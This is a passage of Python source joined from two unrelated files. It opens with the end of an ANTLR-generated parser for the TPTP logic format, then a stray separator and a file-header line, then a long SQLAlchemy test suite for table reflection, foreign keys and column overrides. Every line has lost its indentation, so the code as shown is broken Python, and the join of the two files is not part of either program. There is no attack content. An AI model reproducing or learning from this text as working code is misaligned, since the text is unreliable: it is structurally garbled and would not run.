def fof_or_formula_sempred(self, localctx:Fof_or_formulaContext, predIndex:int):
if predIndex == 8:
return self.precpred(self._ctx, 1)
def fof_and_formula_sempred(self, localctx:Fof_and_formulaContext, predIndex:int):
if predIndex == 9:
return self.precpred(self._ctx, 1)
def cnf_disjunction_sempred(self, localctx:Cnf_disjunctionContext, predIndex:int):
if predIndex == 10:
return self.precpred(self._ctx, 1)
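# The *_sempred helpers above are ANTLR's precedence predicates for the
# grammar's left-recursive rules (thf/tff/fof binary formulas and cnf
# disjunctions): precpred() checks whether the current precedence level
# allows the left-recursive alternative to continue.
# Minimal driving sketch (assumes the companion lexer was generated as
# tptp_v7_0_0_0Lexer and that the grammar's start rule is tptp_file):
#
#     from antlr4 import InputStream, CommonTokenStream
#     from tptp_v7_0_0_0Lexer import tptp_v7_0_0_0Lexer
#
#     tokens = CommonTokenStream(tptp_v7_0_0_0Lexer(InputStream("fof(a, axiom, p).")))
#     tree = tptp_v7_0_0_0Parser(tokens).tptp_file()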
|
py | b414e15ad4426866d21f1837fce0f6995730bd9c | import unicodedata
import sqlalchemy as sa
from sqlalchemy import DefaultClause
from sqlalchemy import FetchedValue
from sqlalchemy import ForeignKey
from sqlalchemy import Index
from sqlalchemy import inspect
from sqlalchemy import Integer
from sqlalchemy import MetaData
from sqlalchemy import schema
from sqlalchemy import sql
from sqlalchemy import String
from sqlalchemy import testing
from sqlalchemy import UniqueConstraint
from sqlalchemy.testing import assert_raises
from sqlalchemy.testing import assert_raises_message
from sqlalchemy.testing import AssertsCompiledSQL
from sqlalchemy.testing import ComparesTables
from sqlalchemy.testing import config
from sqlalchemy.testing import engines
from sqlalchemy.testing import eq_
from sqlalchemy.testing import eq_regex
from sqlalchemy.testing import expect_warnings
from sqlalchemy.testing import fixtures
from sqlalchemy.testing import in_
from sqlalchemy.testing import is_true
from sqlalchemy.testing import mock
from sqlalchemy.testing import not_in_
from sqlalchemy.testing import skip
from sqlalchemy.testing.schema import Column
from sqlalchemy.testing.schema import Table
from sqlalchemy.util import ue
metadata, users = None, None
class ReflectionTest(fixtures.TestBase, ComparesTables):
__backend__ = True
@testing.exclude(
"mssql", "<", (10, 0, 0), "Date is only supported on MSSQL 2008+"
)
@testing.exclude("mysql", "<", (4, 1, 1), "early types are squirrely")
@testing.provide_metadata
def test_basic_reflection(self):
meta = self.metadata
users = Table(
"engine_users",
meta,
Column("user_id", sa.INT, primary_key=True),
Column("user_name", sa.VARCHAR(20), nullable=False),
Column("test1", sa.CHAR(5), nullable=False),
Column("test2", sa.Float(5), nullable=False),
Column("test3", sa.Text),
Column("test4", sa.Numeric(10, 2), nullable=False),
Column("test5", sa.Date),
Column(
"parent_user_id",
sa.Integer,
sa.ForeignKey("engine_users.user_id"),
),
Column("test6", sa.Date, nullable=False),
Column("test7", sa.Text),
Column("test8", sa.LargeBinary),
Column("test_passivedefault2", sa.Integer, server_default="5"),
Column("test9", sa.LargeBinary(100)),
Column("test10", sa.Numeric(10, 2)),
test_needs_fk=True,
)
addresses = Table(
"engine_email_addresses",
meta,
Column("address_id", sa.Integer, primary_key=True),
Column(
"remote_user_id", sa.Integer, sa.ForeignKey(users.c.user_id)
),
Column("email_address", sa.String(20)),
test_needs_fk=True,
)
meta.create_all()
meta2 = MetaData()
reflected_users = Table(
"engine_users", meta2, autoload=True, autoload_with=testing.db
)
reflected_addresses = Table(
"engine_email_addresses",
meta2,
autoload=True,
autoload_with=testing.db,
)
self.assert_tables_equal(users, reflected_users)
self.assert_tables_equal(addresses, reflected_addresses)
@testing.provide_metadata
def test_autoload_with_imply_autoload(self,):
meta = self.metadata
t = Table(
"t",
meta,
Column("id", sa.Integer, primary_key=True),
Column("x", sa.String(20)),
Column("y", sa.Integer),
)
meta.create_all()
meta2 = MetaData()
reflected_t = Table("t", meta2, autoload_with=testing.db)
self.assert_tables_equal(t, reflected_t)
@testing.provide_metadata
def test_two_foreign_keys(self):
meta = self.metadata
Table(
"t1",
meta,
Column("id", sa.Integer, primary_key=True),
Column("t2id", sa.Integer, sa.ForeignKey("t2.id")),
Column("t3id", sa.Integer, sa.ForeignKey("t3.id")),
test_needs_fk=True,
)
Table(
"t2",
meta,
Column("id", sa.Integer, primary_key=True),
test_needs_fk=True,
)
Table(
"t3",
meta,
Column("id", sa.Integer, primary_key=True),
test_needs_fk=True,
)
meta.create_all()
meta2 = MetaData()
t1r, t2r, t3r = [
Table(x, meta2, autoload=True, autoload_with=testing.db)
for x in ("t1", "t2", "t3")
]
assert t1r.c.t2id.references(t2r.c.id)
assert t1r.c.t3id.references(t3r.c.id)
@testing.provide_metadata
def test_resolve_fks_false_table(self):
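        # With resolve_fks=False, reflection loads only the requested table;
        # its ForeignKey targets stay unresolved until the referenced table
        # is itself reflected into the MetaData (exercised below).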
meta = self.metadata
Table(
"t1",
meta,
Column("id", sa.Integer, primary_key=True),
Column("t2id", sa.Integer, sa.ForeignKey("t2.id")),
test_needs_fk=True,
)
Table(
"t2",
meta,
Column("id", sa.Integer, primary_key=True),
test_needs_fk=True,
)
meta.create_all()
meta2 = MetaData()
t1 = Table("t1", meta2, resolve_fks=False, autoload_with=testing.db)
in_("t1", meta2.tables)
not_in_("t2", meta2.tables)
assert_raises(
sa.exc.NoReferencedTableError,
lambda: list(t1.c.t2id.foreign_keys)[0].column,
)
t2 = Table("t2", meta2, autoload_with=testing.db)
# now it resolves
is_true(t1.c.t2id.references(t2.c.id))
@testing.provide_metadata
def test_resolve_fks_false_extend_existing(self):
meta = self.metadata
Table(
"t1",
meta,
Column("id", sa.Integer, primary_key=True),
Column("t2id", sa.Integer, sa.ForeignKey("t2.id")),
test_needs_fk=True,
)
Table(
"t2",
meta,
Column("id", sa.Integer, primary_key=True),
test_needs_fk=True,
)
meta.create_all()
meta2 = MetaData()
Table("t1", meta2)
in_("t1", meta2.tables)
t1 = Table(
"t1",
meta2,
resolve_fks=False,
autoload_with=testing.db,
extend_existing=True,
)
not_in_("t2", meta2.tables)
assert_raises(
sa.exc.NoReferencedTableError,
lambda: list(t1.c.t2id.foreign_keys)[0].column,
)
t2 = Table("t2", meta2, autoload_with=testing.db)
# now it resolves
is_true(t1.c.t2id.references(t2.c.id))
@testing.provide_metadata
def test_resolve_fks_false_metadata(self):
meta = self.metadata
Table(
"t1",
meta,
Column("id", sa.Integer, primary_key=True),
Column("t2id", sa.Integer, sa.ForeignKey("t2.id")),
test_needs_fk=True,
)
Table(
"t2",
meta,
Column("id", sa.Integer, primary_key=True),
test_needs_fk=True,
)
meta.create_all()
meta2 = MetaData()
meta2.reflect(testing.db, resolve_fks=False, only=["t1"])
in_("t1", meta2.tables)
not_in_("t2", meta2.tables)
t1 = meta2.tables["t1"]
assert_raises(
sa.exc.NoReferencedTableError,
lambda: list(t1.c.t2id.foreign_keys)[0].column,
)
meta2.reflect(testing.db, resolve_fks=False)
t2 = meta2.tables["t2"]
is_true(t1.c.t2id.references(t2.c.id))
def test_nonexistent(self):
meta = MetaData(testing.db)
assert_raises(
sa.exc.NoSuchTableError, Table, "nonexistent", meta, autoload=True
)
assert "nonexistent" not in meta.tables
@testing.provide_metadata
def test_include_columns(self):
meta = self.metadata
foo = Table(
"foo",
meta,
*[Column(n, sa.String(30)) for n in ["a", "b", "c", "d", "e", "f"]]
)
meta.create_all()
meta2 = MetaData(testing.db)
foo = Table(
"foo", meta2, autoload=True, include_columns=["b", "f", "e"]
)
# test that cols come back in original order
eq_([c.name for c in foo.c], ["b", "e", "f"])
for c in ("b", "f", "e"):
assert c in foo.c
for c in ("a", "c", "d"):
assert c not in foo.c
# test against a table which is already reflected
meta3 = MetaData(testing.db)
foo = Table("foo", meta3, autoload=True)
foo = Table(
"foo", meta3, include_columns=["b", "f", "e"], extend_existing=True
)
eq_([c.name for c in foo.c], ["b", "e", "f"])
for c in ("b", "f", "e"):
assert c in foo.c
for c in ("a", "c", "d"):
assert c not in foo.c
@testing.provide_metadata
def test_extend_existing(self):
meta = self.metadata
Table(
"t",
meta,
Column("id", Integer, primary_key=True),
Column("x", Integer),
Column("y", Integer),
Column("z", Integer, server_default="5"),
)
meta.create_all()
m2 = MetaData()
old_z = Column("z", String, primary_key=True)
old_y = Column("y", String)
old_q = Column("q", Integer)
t2 = Table("t", m2, old_z, old_q)
eq_(t2.primary_key.columns, (t2.c.z,))
t2 = Table(
"t",
m2,
old_y,
extend_existing=True,
autoload=True,
autoload_with=testing.db,
)
eq_(set(t2.columns.keys()), set(["x", "y", "z", "q", "id"]))
eq_(t2.primary_key.columns, (t2.c.id,))
assert t2.c.z is not old_z
assert t2.c.y is old_y
assert t2.c.z.type._type_affinity is Integer
assert t2.c.q is old_q
m3 = MetaData()
t3 = Table("t", m3, Column("z", Integer))
t3 = Table(
"t",
m3,
extend_existing=False,
autoload=True,
autoload_with=testing.db,
)
eq_(set(t3.columns.keys()), set(["z"]))
m4 = MetaData()
old_z = Column("z", String, primary_key=True)
old_y = Column("y", String)
old_q = Column("q", Integer)
t4 = Table("t", m4, old_z, old_q)
eq_(t4.primary_key.columns, (t4.c.z,))
t4 = Table(
"t",
m4,
old_y,
extend_existing=True,
autoload=True,
autoload_replace=False,
autoload_with=testing.db,
)
eq_(set(t4.columns.keys()), set(["x", "y", "z", "q", "id"]))
eq_(t4.primary_key.columns, (t4.c.id,))
assert t4.c.z is old_z
assert t4.c.y is old_y
assert t4.c.z.type._type_affinity is String
assert t4.c.q is old_q
@testing.provide_metadata
def test_extend_existing_reflect_all_dont_dupe_index(self):
m = self.metadata
d = Table(
"d",
m,
Column("id", Integer, primary_key=True),
Column("foo", String(50)),
Column("bar", String(50)),
UniqueConstraint("bar"),
)
Index("foo_idx", d.c.foo)
Table(
"b",
m,
Column("id", Integer, primary_key=True),
Column("aid", ForeignKey("d.id")),
)
m.create_all()
m2 = MetaData()
m2.reflect(testing.db, extend_existing=True)
eq_(
len(
[
idx
for idx in m2.tables["d"].indexes
if idx.name == "foo_idx"
]
),
1,
)
if (
# fmt: off
testing.requires.
unique_constraint_reflection_no_index_overlap.enabled
# fmt: on
):
eq_(
len(
[
const
for const in m2.tables["d"].constraints
if isinstance(const, UniqueConstraint)
]
),
1,
)
@testing.emits_warning(r".*omitted columns")
@testing.provide_metadata
def test_include_columns_indexes(self):
m = self.metadata
t1 = Table("t1", m, Column("a", sa.Integer), Column("b", sa.Integer))
sa.Index("foobar", t1.c.a, t1.c.b)
sa.Index("bat", t1.c.a)
m.create_all()
m2 = MetaData(testing.db)
t2 = Table("t1", m2, autoload=True)
assert len(t2.indexes) == 2
m2 = MetaData(testing.db)
t2 = Table("t1", m2, autoload=True, include_columns=["a"])
assert len(t2.indexes) == 1
m2 = MetaData(testing.db)
t2 = Table("t1", m2, autoload=True, include_columns=["a", "b"])
assert len(t2.indexes) == 2
@testing.provide_metadata
def test_autoload_replace_foreign_key_nonpresent(self):
"""test autoload_replace=False with col plus FK
establishes the FK not present in the DB.
"""
Table("a", self.metadata, Column("id", Integer, primary_key=True))
Table(
"b",
self.metadata,
Column("id", Integer, primary_key=True),
Column("a_id", Integer),
)
self.metadata.create_all()
m2 = MetaData()
b2 = Table("b", m2, Column("a_id", Integer, sa.ForeignKey("a.id")))
a2 = Table("a", m2, autoload=True, autoload_with=testing.db)
b2 = Table(
"b",
m2,
extend_existing=True,
autoload=True,
autoload_with=testing.db,
autoload_replace=False,
)
assert b2.c.id is not None
assert b2.c.a_id.references(a2.c.id)
eq_(len(b2.constraints), 2)
@testing.provide_metadata
def test_autoload_replace_foreign_key_ispresent(self):
"""test autoload_replace=False with col plus FK mirroring
DB-reflected FK skips the reflected FK and installs
the in-python one only.
"""
Table("a", self.metadata, Column("id", Integer, primary_key=True))
Table(
"b",
self.metadata,
Column("id", Integer, primary_key=True),
Column("a_id", Integer, sa.ForeignKey("a.id")),
)
self.metadata.create_all()
m2 = MetaData()
b2 = Table("b", m2, Column("a_id", Integer, sa.ForeignKey("a.id")))
a2 = Table("a", m2, autoload=True, autoload_with=testing.db)
b2 = Table(
"b",
m2,
extend_existing=True,
autoload=True,
autoload_with=testing.db,
autoload_replace=False,
)
assert b2.c.id is not None
assert b2.c.a_id.references(a2.c.id)
eq_(len(b2.constraints), 2)
@testing.provide_metadata
def test_autoload_replace_foreign_key_removed(self):
"""test autoload_replace=False with col minus FK that's in the
DB means the FK is skipped and doesn't get installed at all.
"""
Table("a", self.metadata, Column("id", Integer, primary_key=True))
Table(
"b",
self.metadata,
Column("id", Integer, primary_key=True),
Column("a_id", Integer, sa.ForeignKey("a.id")),
)
self.metadata.create_all()
m2 = MetaData()
b2 = Table("b", m2, Column("a_id", Integer))
a2 = Table("a", m2, autoload=True, autoload_with=testing.db)
b2 = Table(
"b",
m2,
extend_existing=True,
autoload=True,
autoload_with=testing.db,
autoload_replace=False,
)
assert b2.c.id is not None
assert not b2.c.a_id.references(a2.c.id)
eq_(len(b2.constraints), 1)
@testing.provide_metadata
def test_autoload_replace_primary_key(self):
Table("a", self.metadata, Column("id", Integer))
self.metadata.create_all()
m2 = MetaData()
a2 = Table("a", m2, Column("id", Integer, primary_key=True))
Table(
"a",
m2,
autoload=True,
autoload_with=testing.db,
autoload_replace=False,
extend_existing=True,
)
eq_(list(a2.primary_key), [a2.c.id])
def test_autoload_replace_arg(self):
Table("t", MetaData(), autoload_replace=False)
@testing.provide_metadata
def test_autoincrement_col(self):
"""test that 'autoincrement' is reflected according to sqla's policy.
        Don't mark this test as unsupported for any backend!
"""
meta = self.metadata
Table(
"test",
meta,
Column("id", sa.Integer, primary_key=True),
Column("data", sa.String(50)),
mysql_engine="InnoDB",
)
Table(
"test2",
meta,
Column(
"id", sa.Integer, sa.ForeignKey("test.id"), primary_key=True
),
Column("id2", sa.Integer, primary_key=True),
Column("data", sa.String(50)),
mysql_engine="InnoDB",
)
meta.create_all()
m2 = MetaData(testing.db)
t1a = Table("test", m2, autoload=True)
assert t1a._autoincrement_column is t1a.c.id
t2a = Table("test2", m2, autoload=True)
assert t2a._autoincrement_column is None
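        # test2 has a composite primary key (and its 'id' is also an FK),
        # so no implicit autoincrement column is assigned.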
@skip("sqlite")
@testing.provide_metadata
def test_unknown_types(self):
"""Test the handling of unknown types for the given dialect.
sqlite is skipped because it has special rules for unknown types using
'affinity types' - this feature is tested in that dialect's test spec.
"""
meta = self.metadata
t = Table("test", meta, Column("foo", sa.DateTime))
ischema_names = testing.db.dialect.ischema_names
t.create()
testing.db.dialect.ischema_names = {}
try:
m2 = MetaData(testing.db)
assert_raises(sa.exc.SAWarning, Table, "test", m2, autoload=True)
@testing.emits_warning("Did not recognize type")
def warns():
m3 = MetaData(testing.db)
t3 = Table("test", m3, autoload=True)
assert t3.c.foo.type.__class__ == sa.types.NullType
finally:
testing.db.dialect.ischema_names = ischema_names
@testing.provide_metadata
def test_basic_override(self):
meta = self.metadata
table = Table(
"override_test",
meta,
Column("col1", sa.Integer, primary_key=True),
Column("col2", sa.String(20)),
Column("col3", sa.Numeric),
)
table.create()
meta2 = MetaData(testing.db)
table = Table(
"override_test",
meta2,
Column("col2", sa.Unicode()),
Column("col4", sa.String(30)),
autoload=True,
)
self.assert_(isinstance(table.c.col1.type, sa.Integer))
self.assert_(isinstance(table.c.col2.type, sa.Unicode))
self.assert_(isinstance(table.c.col4.type, sa.String))
@testing.provide_metadata
def test_override_upgrade_pk_flag(self):
meta = self.metadata
table = Table(
"override_test",
meta,
Column("col1", sa.Integer),
Column("col2", sa.String(20)),
Column("col3", sa.Numeric),
)
table.create()
meta2 = MetaData(testing.db)
table = Table(
"override_test",
meta2,
Column("col1", sa.Integer, primary_key=True),
autoload=True,
)
eq_(list(table.primary_key), [table.c.col1])
eq_(table.c.col1.primary_key, True)
@testing.provide_metadata
def test_override_pkfk(self):
"""test that you can override columns which contain foreign keys
to other reflected tables, where the foreign key column is also
a primary key column"""
meta = self.metadata
Table(
"users",
meta,
Column("id", sa.Integer, primary_key=True),
Column("name", sa.String(30)),
)
Table(
"addresses",
meta,
Column("id", sa.Integer, primary_key=True),
Column("street", sa.String(30)),
)
meta.create_all()
meta2 = MetaData(testing.db)
a2 = Table(
"addresses",
meta2,
Column(
"id", sa.Integer, sa.ForeignKey("users.id"), primary_key=True
),
autoload=True,
)
u2 = Table("users", meta2, autoload=True)
assert list(a2.primary_key) == [a2.c.id]
assert list(u2.primary_key) == [u2.c.id]
assert u2.join(a2).onclause.compare(u2.c.id == a2.c.id)
meta3 = MetaData(testing.db)
u3 = Table("users", meta3, autoload=True)
a3 = Table(
"addresses",
meta3,
Column(
"id", sa.Integer, sa.ForeignKey("users.id"), primary_key=True
),
autoload=True,
)
assert list(a3.primary_key) == [a3.c.id]
assert list(u3.primary_key) == [u3.c.id]
assert u3.join(a3).onclause.compare(u3.c.id == a3.c.id)
@testing.provide_metadata
def test_override_nonexistent_fk(self):
"""test that you can override columns and create new foreign
        keys to other reflected tables which have no foreign keys. This
is common with MySQL MyISAM tables."""
meta = self.metadata
Table(
"users",
meta,
Column("id", sa.Integer, primary_key=True),
Column("name", sa.String(30)),
)
Table(
"addresses",
meta,
Column("id", sa.Integer, primary_key=True),
Column("street", sa.String(30)),
Column("user_id", sa.Integer),
)
meta.create_all()
meta2 = MetaData(testing.db)
a2 = Table(
"addresses",
meta2,
Column("user_id", sa.Integer, sa.ForeignKey("users.id")),
autoload=True,
)
u2 = Table("users", meta2, autoload=True)
assert len(a2.c.user_id.foreign_keys) == 1
assert len(a2.foreign_keys) == 1
assert [c.parent for c in a2.foreign_keys] == [a2.c.user_id]
assert [c.parent for c in a2.c.user_id.foreign_keys] == [a2.c.user_id]
assert list(a2.c.user_id.foreign_keys)[0].parent is a2.c.user_id
assert u2.join(a2).onclause.compare(u2.c.id == a2.c.user_id)
meta3 = MetaData(testing.db)
u3 = Table("users", meta3, autoload=True)
a3 = Table(
"addresses",
meta3,
Column("user_id", sa.Integer, sa.ForeignKey("users.id")),
autoload=True,
)
assert u3.join(a3).onclause.compare(u3.c.id == a3.c.user_id)
meta4 = MetaData(testing.db)
u4 = Table(
"users",
meta4,
Column("id", sa.Integer, key="u_id", primary_key=True),
autoload=True,
)
a4 = Table(
"addresses",
meta4,
Column("id", sa.Integer, key="street", primary_key=True),
Column("street", sa.String(30), key="user_id"),
Column(
"user_id", sa.Integer, sa.ForeignKey("users.u_id"), key="id"
),
autoload=True,
)
assert u4.join(a4).onclause.compare(u4.c.u_id == a4.c.id)
assert list(u4.primary_key) == [u4.c.u_id]
assert len(u4.columns) == 2
assert len(u4.constraints) == 1
assert len(a4.columns) == 3
assert len(a4.constraints) == 2
@testing.provide_metadata
def test_override_composite_fk(self):
"""Test double-remove of composite foreign key, when replaced."""
metadata = self.metadata
Table(
"a",
metadata,
Column("x", sa.Integer, primary_key=True),
Column("y", sa.Integer, primary_key=True),
)
Table(
"b",
metadata,
Column("x", sa.Integer, primary_key=True),
Column("y", sa.Integer, primary_key=True),
sa.ForeignKeyConstraint(["x", "y"], ["a.x", "a.y"]),
)
metadata.create_all()
meta2 = MetaData()
c1 = Column("x", sa.Integer, primary_key=True)
c2 = Column("y", sa.Integer, primary_key=True)
f1 = sa.ForeignKeyConstraint(["x", "y"], ["a.x", "a.y"])
b1 = Table(
"b", meta2, c1, c2, f1, autoload=True, autoload_with=testing.db
)
assert b1.c.x is c1
assert b1.c.y is c2
assert f1 in b1.constraints
assert len(b1.constraints) == 2
@testing.provide_metadata
def test_override_keys(self):
"""test that columns can be overridden with a 'key',
and that ForeignKey targeting during reflection still works."""
meta = self.metadata
Table(
"a",
meta,
Column("x", sa.Integer, primary_key=True),
Column("z", sa.Integer),
test_needs_fk=True,
)
Table(
"b",
meta,
Column("y", sa.Integer, sa.ForeignKey("a.x")),
test_needs_fk=True,
)
meta.create_all()
m2 = MetaData(testing.db)
a2 = Table(
"a",
m2,
Column("x", sa.Integer, primary_key=True, key="x1"),
autoload=True,
)
b2 = Table("b", m2, autoload=True)
assert a2.join(b2).onclause.compare(a2.c.x1 == b2.c.y)
assert b2.c.y.references(a2.c.x1)
@testing.provide_metadata
def test_nonreflected_fk_raises(self):
"""test that a NoReferencedColumnError is raised when reflecting
a table with an FK to another table which has not included the target
column in its reflection.
"""
meta = self.metadata
Table(
"a",
meta,
Column("x", sa.Integer, primary_key=True),
Column("z", sa.Integer),
test_needs_fk=True,
)
Table(
"b",
meta,
Column("y", sa.Integer, sa.ForeignKey("a.x")),
test_needs_fk=True,
)
meta.create_all()
m2 = MetaData(testing.db)
a2 = Table("a", m2, include_columns=["z"], autoload=True)
b2 = Table("b", m2, autoload=True)
assert_raises(sa.exc.NoReferencedColumnError, a2.join, b2)
@testing.exclude("mysql", "<", (4, 1, 1), "innodb funkiness")
@testing.provide_metadata
def test_override_existing_fk(self):
"""test that you can override columns and specify new foreign
keys to other reflected tables, on columns which *do* already
have that foreign key, and that the FK is not duped. """
meta = self.metadata
Table(
"users",
meta,
Column("id", sa.Integer, primary_key=True),
Column("name", sa.String(30)),
test_needs_fk=True,
)
Table(
"addresses",
meta,
Column("id", sa.Integer, primary_key=True),
Column("user_id", sa.Integer, sa.ForeignKey("users.id")),
test_needs_fk=True,
)
meta.create_all()
meta2 = MetaData(testing.db)
a2 = Table(
"addresses",
meta2,
Column("user_id", sa.Integer, sa.ForeignKey("users.id")),
autoload=True,
)
u2 = Table("users", meta2, autoload=True)
s = sa.select([a2])
assert s.c.user_id is not None
assert len(a2.foreign_keys) == 1
assert len(a2.c.user_id.foreign_keys) == 1
assert len(a2.constraints) == 2
assert [c.parent for c in a2.foreign_keys] == [a2.c.user_id]
assert [c.parent for c in a2.c.user_id.foreign_keys] == [a2.c.user_id]
assert list(a2.c.user_id.foreign_keys)[0].parent is a2.c.user_id
assert u2.join(a2).onclause.compare(u2.c.id == a2.c.user_id)
meta2 = MetaData(testing.db)
u2 = Table(
"users",
meta2,
Column("id", sa.Integer, primary_key=True),
autoload=True,
)
a2 = Table(
"addresses",
meta2,
Column("id", sa.Integer, primary_key=True),
Column("user_id", sa.Integer, sa.ForeignKey("users.id")),
autoload=True,
)
s = sa.select([a2])
assert s.c.user_id is not None
assert len(a2.foreign_keys) == 1
assert len(a2.c.user_id.foreign_keys) == 1
assert len(a2.constraints) == 2
assert [c.parent for c in a2.foreign_keys] == [a2.c.user_id]
assert [c.parent for c in a2.c.user_id.foreign_keys] == [a2.c.user_id]
assert list(a2.c.user_id.foreign_keys)[0].parent is a2.c.user_id
assert u2.join(a2).onclause.compare(u2.c.id == a2.c.user_id)
@testing.only_on(["postgresql", "mysql"])
@testing.provide_metadata
def test_fk_options(self):
"""test that foreign key reflection includes options (on
backends with {dialect}.get_foreign_keys() support)"""
if testing.against("postgresql"):
test_attrs = (
"match",
"onupdate",
"ondelete",
"deferrable",
"initially",
)
addresses_user_id_fkey = sa.ForeignKey(
# Each option is specifically not a Postgres default, or
# it won't be returned by PG's inspection
"users.id",
name="addresses_user_id_fkey",
match="FULL",
onupdate="RESTRICT",
ondelete="RESTRICT",
deferrable=True,
initially="DEFERRED",
)
elif testing.against("mysql"):
            # MATCH, DEFERRABLE, and INITIALLY cannot be defined for MySQL.
# ON UPDATE and ON DELETE have defaults of RESTRICT, which are
# elided by MySQL's inspection
addresses_user_id_fkey = sa.ForeignKey(
"users.id",
name="addresses_user_id_fkey",
onupdate="CASCADE",
ondelete="CASCADE",
)
test_attrs = ("onupdate", "ondelete")
meta = self.metadata
Table(
"users",
meta,
Column("id", sa.Integer, primary_key=True),
Column("name", sa.String(30)),
test_needs_fk=True,
)
Table(
"addresses",
meta,
Column("id", sa.Integer, primary_key=True),
Column("user_id", sa.Integer, addresses_user_id_fkey),
test_needs_fk=True,
)
meta.create_all()
meta2 = MetaData()
meta2.reflect(testing.db)
for fk in meta2.tables["addresses"].foreign_keys:
ref = addresses_user_id_fkey
for attr in test_attrs:
eq_(getattr(fk, attr), getattr(ref, attr))
def test_pks_not_uniques(self):
"""test that primary key reflection not tripped up by unique
indexes"""
testing.db.execute(
"""
CREATE TABLE book (
id INTEGER NOT NULL,
title VARCHAR(100) NOT NULL,
series INTEGER,
series_id INTEGER,
UNIQUE(series, series_id),
PRIMARY KEY(id)
)"""
)
try:
metadata = MetaData(bind=testing.db)
book = Table("book", metadata, autoload=True)
assert book.primary_key.contains_column(book.c.id)
assert not book.primary_key.contains_column(book.c.series)
assert len(book.primary_key) == 1
finally:
testing.db.execute("drop table book")
def test_fk_error(self):
metadata = MetaData(testing.db)
Table(
"slots",
metadata,
Column("slot_id", sa.Integer, primary_key=True),
Column("pkg_id", sa.Integer, sa.ForeignKey("pkgs.pkg_id")),
Column("slot", sa.String(128)),
)
assert_raises_message(
sa.exc.InvalidRequestError,
"Foreign key associated with column 'slots.pkg_id' "
"could not find table 'pkgs' with which to generate "
"a foreign key to target column 'pkg_id'",
metadata.create_all,
)
def test_composite_pks(self):
"""test reflection of a composite primary key"""
testing.db.execute(
"""
CREATE TABLE book (
id INTEGER NOT NULL,
isbn VARCHAR(50) NOT NULL,
title VARCHAR(100) NOT NULL,
series INTEGER NOT NULL,
series_id INTEGER NOT NULL,
UNIQUE(series, series_id),
PRIMARY KEY(id, isbn)
)"""
)
try:
metadata = MetaData(bind=testing.db)
book = Table("book", metadata, autoload=True)
assert book.primary_key.contains_column(book.c.id)
assert book.primary_key.contains_column(book.c.isbn)
assert not book.primary_key.contains_column(book.c.series)
assert len(book.primary_key) == 2
finally:
testing.db.execute("drop table book")
@testing.exclude("mysql", "<", (4, 1, 1), "innodb funkiness")
@testing.provide_metadata
def test_composite_fk(self):
"""test reflection of composite foreign keys"""
meta = self.metadata
multi = Table(
"multi",
meta,
Column("multi_id", sa.Integer, primary_key=True),
Column("multi_rev", sa.Integer, primary_key=True),
Column("multi_hoho", sa.Integer, primary_key=True),
Column("name", sa.String(50), nullable=False),
Column("val", sa.String(100)),
test_needs_fk=True,
)
multi2 = Table(
"multi2",
meta,
Column("id", sa.Integer, primary_key=True),
Column("foo", sa.Integer),
Column("bar", sa.Integer),
Column("lala", sa.Integer),
Column("data", sa.String(50)),
sa.ForeignKeyConstraint(
["foo", "bar", "lala"],
["multi.multi_id", "multi.multi_rev", "multi.multi_hoho"],
),
test_needs_fk=True,
)
meta.create_all()
meta2 = MetaData()
table = Table("multi", meta2, autoload=True, autoload_with=testing.db)
table2 = Table(
"multi2", meta2, autoload=True, autoload_with=testing.db
)
self.assert_tables_equal(multi, table)
self.assert_tables_equal(multi2, table2)
j = sa.join(table, table2)
self.assert_(
sa.and_(
table.c.multi_id == table2.c.foo,
table.c.multi_rev == table2.c.bar,
table.c.multi_hoho == table2.c.lala,
).compare(j.onclause)
)
@testing.crashes("oracle", "FIXME: unknown, confirm not fails_on")
@testing.requires.check_constraints
@testing.provide_metadata
def test_reserved(self):
        # check that a table which uses a SQL reserved name doesn't cause
        # an error
meta = self.metadata
table_a = Table(
"select",
meta,
Column("not", sa.Integer, primary_key=True),
Column("from", sa.String(12), nullable=False),
sa.UniqueConstraint("from", name="when"),
)
sa.Index("where", table_a.c["from"])
# There's currently no way to calculate identifier case
# normalization in isolation, so...
if testing.against("firebird", "oracle"):
check_col = "TRUE"
else:
check_col = "true"
quoter = meta.bind.dialect.identifier_preparer.quote_identifier
Table(
"false",
meta,
Column("create", sa.Integer, primary_key=True),
Column("true", sa.Integer, sa.ForeignKey("select.not")),
sa.CheckConstraint("%s <> 1" % quoter(check_col), name="limit"),
)
table_c = Table(
"is",
meta,
Column("or", sa.Integer, nullable=False, primary_key=True),
Column("join", sa.Integer, nullable=False, primary_key=True),
sa.PrimaryKeyConstraint("or", "join", name="to"),
)
index_c = sa.Index("else", table_c.c.join)
meta.create_all()
index_c.drop()
meta2 = MetaData(testing.db)
Table("select", meta2, autoload=True)
Table("false", meta2, autoload=True)
Table("is", meta2, autoload=True)
@testing.provide_metadata
def _test_reflect_uses_bind(self, fn):
from sqlalchemy.pool import AssertionPool
e = engines.testing_engine(options={"poolclass": AssertionPool})
fn(e)
@testing.uses_deprecated()
def test_reflect_uses_bind_constructor_conn(self):
self._test_reflect_uses_bind(
lambda e: MetaData(e.connect(), reflect=True)
)
@testing.uses_deprecated()
def test_reflect_uses_bind_constructor_engine(self):
self._test_reflect_uses_bind(lambda e: MetaData(e, reflect=True))
def test_reflect_uses_bind_constructor_conn_reflect(self):
self._test_reflect_uses_bind(lambda e: MetaData(e.connect()).reflect())
def test_reflect_uses_bind_constructor_engine_reflect(self):
self._test_reflect_uses_bind(lambda e: MetaData(e).reflect())
def test_reflect_uses_bind_conn_reflect(self):
self._test_reflect_uses_bind(lambda e: MetaData().reflect(e.connect()))
def test_reflect_uses_bind_engine_reflect(self):
self._test_reflect_uses_bind(lambda e: MetaData().reflect(e))
@testing.provide_metadata
def test_reflect_all(self):
existing = testing.db.table_names()
names = ["rt_%s" % name for name in ("a", "b", "c", "d", "e")]
nameset = set(names)
for name in names:
# be sure our starting environment is sane
self.assert_(name not in existing)
self.assert_("rt_f" not in existing)
baseline = self.metadata
for name in names:
Table(name, baseline, Column("id", sa.Integer, primary_key=True))
baseline.create_all()
m1 = MetaData(testing.db)
self.assert_(not m1.tables)
m1.reflect()
self.assert_(nameset.issubset(set(m1.tables.keys())))
m2 = MetaData()
m2.reflect(testing.db, only=["rt_a", "rt_b"])
self.assert_(set(m2.tables.keys()) == set(["rt_a", "rt_b"]))
m3 = MetaData()
c = testing.db.connect()
m3.reflect(bind=c, only=lambda name, meta: name == "rt_c")
self.assert_(set(m3.tables.keys()) == set(["rt_c"]))
m4 = MetaData(testing.db)
assert_raises_message(
sa.exc.InvalidRequestError,
r"Could not reflect: requested table\(s\) not available in "
r"Engine\(.*?\): \(rt_f\)",
m4.reflect,
only=["rt_a", "rt_f"],
)
